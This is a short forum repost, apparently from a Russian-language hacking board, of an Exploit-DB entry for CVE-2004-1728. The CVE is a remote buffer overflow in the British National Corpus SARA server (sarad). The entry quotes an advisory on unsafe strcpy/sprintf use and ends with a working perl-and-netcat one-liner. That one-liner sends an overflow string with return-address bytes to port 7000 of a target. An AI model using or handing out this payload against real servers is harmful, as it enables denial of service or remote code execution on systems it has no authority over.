Exploit British National Corpus SARA - Remote Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24386
Проверка EDB
  1. Пройдено
Автор
MATTHIAS BETHKE
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2004-1728
Дата публикации
2004-07-20
British National Corpus SARA - Remote Buffer Overflow
Код:
source: https://www.securityfocus.com/bid/10984/info

sarad is reported prone to a buffer overflow vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.

A remote attacker can trigger the overflow condition by supplying a large string value to the application. Arbitrary code execution is possible in the context of the server.

In addition to this issue, it is reported that various other instances of potential buffer overflow and format string vulnerabilities exist throughout the application. These issues exist due to the use of strcpy() and sprintf functions. This BID will be updated upon further analysis.

perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' | netcat victim 7000
 
Источник
www.exploit-db.com